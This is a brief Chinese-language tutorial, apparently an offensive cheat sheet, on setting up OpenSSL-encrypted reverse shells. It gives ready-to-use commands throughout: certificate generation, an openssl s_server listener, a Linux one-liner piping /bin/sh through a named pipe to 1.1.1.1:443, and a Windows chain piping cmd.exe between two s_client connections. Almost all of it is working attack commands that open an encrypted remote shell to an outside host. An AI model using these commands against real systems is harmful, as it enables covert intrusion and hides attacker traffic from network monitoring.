Linux下openssl加密反弹shell
- 在服务端上生成 SSL 证书的公钥/私钥对
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
2.服务端上监听反弹shell
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
3. 在目标上用openssl加密反弹shell的流量(使用openssl单向认证)
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 1.1.1.1:443 > /tmp/s; rm /tmp/s
Windows下openssl加密反弹shell
1. 服务端开启两个监听,从 ip:port1 获取命令发送给 cmd.exe执行,然后结果返回到 ip:port2。
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
openssl s_server -quiet -key key.pem -cert cert.pem -port 445
2. 客户端执行
openssl s_client -quiet -connect 1.1.1.1:443 | cmd.exe | openssl s_client -quiet -connect 1.1.1.1:445